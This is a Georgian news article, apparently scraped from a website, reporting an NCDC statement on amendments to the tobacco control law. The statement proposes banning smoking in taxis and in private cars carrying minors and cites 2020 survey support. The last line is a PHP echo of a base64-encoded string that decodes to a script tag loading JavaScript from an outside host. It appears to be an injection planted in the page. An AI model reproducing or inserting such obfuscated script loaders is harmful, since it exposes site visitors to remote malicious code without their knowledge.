celsiusi
ავერსი საქკაბელი
NCDC-ში აცხადებენ, რომ „თამბაქოს კონტროლის შესახებ“ საქართველოს კანონში შემავალ ცვლილებებთან დაკავშირებით ქართული მედია-საშუალებებით მცდარი ინფორმაცია გავრცელდა. მათი თქმით, საუბარია კერძო კუთვნილების ავტომობილებში მოწევის შესაძლო აკრძალვის დამახინჯებულ ინტერპრეტაციაზე.
 
"2017 წლის 17 მაისს, „თამბაქოს კონტროლის შესახებ“ საქართველოს კანონის მიღებისას დაიშვა რამდენიმე გამონაკლისი. ერთ-ერთია ტაქსიში მოწევის ნებადართულობა. რადგან ტაქსი ფართოდ გამოყენებული საზოგადოებრივი ტრანსპორტია, მასში მოწევის საკითხის დაურეგულირებლობა არღვევს ადამიანის ფუნდამენტურ უფლებას, იცხოვროს ჯანსაღ და უსაფრთხო გარემოში; ტაქსის მძღოლი რეგულარულად იმყოფება მგზავრების მიერ სიგარეტის მოწევის შედეგად წარმოქმნილი მეორადი კვამლის და სალონში დალექილი ტოქსინებისა და კანცეროგენების (მესამეული მწეველობა) ზემოქმედების ქვეშ, რაც აუარესებს მის ჯანმრთელობას და ზრდის ადრეული გარდაცვალების რისკს; მწეველი მძღოლის, ან მგზავრების გამო, მეორადი და მესამეული თამბაქოს კვამლის გავლენის შედეგად არამწეველ მგზავრებსაც სერიოზული საფრთხე ექმნებათ; ხშირად წარმოიქმნება კონფლიქტი მძღოლსა და მგზავრს შორის; მძღოლის მიერ თამბაქოს მოხმარება, ასევე დაკავშირებულია ავტომობილის მართვის დროს ყურადღებისა და მანევრირების შესუსტებასთან, რაც ზრდის ავტო-საგზაო შემთხვევების რისკს; ხშირია შემთხვევები, როდესაც მწეველი მძღოლი ან მგზავრი მგზავრობის დროს ნამწვს ფანჯრიდან გარეთ აგდებს და ამით ზიანს აყენებს გარემოს და სხვ.
 
უკიდურესად მნიშვნელოვანია, მეორე გამონაკლისის აღმოფხვრაც - თამბაქოს მოხმარება პირადი კუთვნილების ავტომობილში, როდესაც სალონში არასრულწლოვანი იმყოფება. ამ საკითხის დაურეგულირებლობა არღვევს ბავშვის ფუნდამენტურ უფლებას, იცხოვროს ჯანსაღ და უსაფრთხო გარემოში. საქართველოში, ყოველწლიურად, 300 არასრულწლოვანი იღუპება თამბაქოს პასიური მოხმარების გამო. მწეველი მშობლის/მეურვის მიერ მანქანის მართვისას თამბაქოს ნებისმიერი პროდუქტის გამოყენების შემთხვევაში ბავშვი რეგულარულად განიცდის სიგარეტის მოწევის შედეგად წარმოქმნილი მეორადი კვამლის და სალონში დალექილი ტოქსინებისა და კანცეროგენების (მესამეული მწეველობა) ზემოქმედებას, რაც აუარესებს მის ჯანმრთელობას და ზრდის დაავადებების ადრეული განვითარების შედეგად გარდაცვალების რისკს.
 
დაავადებათა კონტროლისა და საზოგადოებრივი ჯანმრთელობის ეროვნულმა ცენტრმა 2020 წლის ოქტომბერში სპეციალურად ჩაატარა მოსახლეობის კვლევა ტაქსებში და კერძო ავტომობილებში, სადაც არასრულწლოვანი იმყოფება, მოწევის აკრძალვის შესახებ. კვლევის შედეგების მიხედვით საქართველოს მოსახლეობის 86% და მწეველი მოსახლეობის 68.2% მხარს უჭერს მოწევის აკრძალვას ტაქსებში; საქართველოს მოსახლეობის 84.6% და მწეველი მოსახლეობის 73.8% კი მხარს უჭერს მოწევის აკრძალვას კერძო ავტომობილებში, თუ ავტომობილში არასრულწლოვანია.
 
ყოველივე ზემოაღნიშნულიდან გამომდინარე, დაავადებათა კონტროლისა და საზოგადოებრივი ჯანმრთელობის ეროვნული ცენტრი სხვადასხვა დაინტერესებული უწყებისა და ექსპერტის ჩართულობით ამზადებს ცვლილების პროექტს „თამბაქოს კონტროლის შესახებ“ საქართველოს კანონში.
 
ცვლილებების ძირითადი მიზანია თამბაქოთი გამოწვეული ავადობისა და სიკვდილიანობის შემცირება; არამწეველთა, მათ შორის არასრულწლოვანთა დაცვა თამბაქოს კვამლისგან, თამბაქოთი გამოწვეული ეკონომიკური და სოციალური ზარალის შემცირება და სხვ"-ნათქვამია განცხადებაში. 
1322
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");